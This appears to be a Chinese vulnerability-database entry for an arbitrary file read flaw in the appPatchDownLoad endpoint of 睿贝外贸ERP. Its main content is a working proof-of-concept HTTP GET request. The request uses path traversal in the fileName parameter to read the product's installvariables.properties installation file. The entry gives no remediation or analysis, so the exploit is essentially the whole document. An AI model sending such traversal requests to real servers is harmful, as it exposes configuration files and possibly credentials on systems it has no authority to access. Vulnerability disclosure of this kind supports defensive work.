睿贝外贸ERP appPatchDownLoad 任意文件读取漏洞

日期: 2024-04-30 | 影响软件: 睿贝外贸ERP | POC: 已公开

漏洞描述

睿贝外贸ERP appPatchDownLoad 任意文件读取漏洞

PoC代码

GET /appPatchDownLoad?fileName=../../../../RebeeCRM/_RebeeCRM_installation/installvariables.properties HTTP/1.1
Host: 

相关漏洞推荐